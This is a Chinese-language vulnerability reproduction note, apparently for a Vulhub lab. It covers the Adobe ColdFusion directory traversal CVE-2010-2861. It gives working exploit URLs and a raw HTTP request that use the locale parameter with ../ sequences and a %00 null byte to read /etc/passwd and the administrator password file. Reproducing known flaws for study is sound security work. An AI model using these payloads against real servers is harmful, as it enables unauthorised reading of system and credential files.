Adobe ColdFusion 目录遍历漏洞 (CVE-2010-2861)

漏洞环境均基于Vulhub

简介

Adobe ColdFusion 是由 JJ Allaire 于 1995 年创建的商业快速 Web 应用程序开发计算平台。

版本

Adobe ColdFusion 9.0.1 及更早版本中存在目录遍历漏洞，该漏洞允许远程攻击者通过 (1) CFIDE/administrator/settings/mappings.cfm, (2) logging/settings.cfm 的 locale 参数读取任意文件, (3) datasources/index.cfm, (4) j2eepackaging/editarchive.cfm, 和 (5) enter.cfm in CFIDE/administrator/.

Adobe ColdFusion 8、9版本中存在一处目录穿越漏洞，可导致未授权的用户读取服务器任意文件。

复现

访问http://216.127.164.238:8500/CFIDE/administrator/enter.cfm看到初始化页面，输入密码admin初始化整个服务器。

读取/etc/passwd

http://216.127.164.238:8500/CFIDE/administrator/enter.cfm?locale=../../../../../../../../../../etc/passwd%00en

GET /CFIDE/administrator/enter.cfm?locale=../../../../../../../../../../etc/passwd%00en HTTP/1.1
Host: 216.127.164.238:8500
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:104.0) Gecko/20100101 Firefox/104.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1

//带cookie不能成功

读取后台管理员密码

http://216.127.164.238:8500/CFIDE/administrator/enter.cfm?locale=../../../../../../../lib/password.properties%00en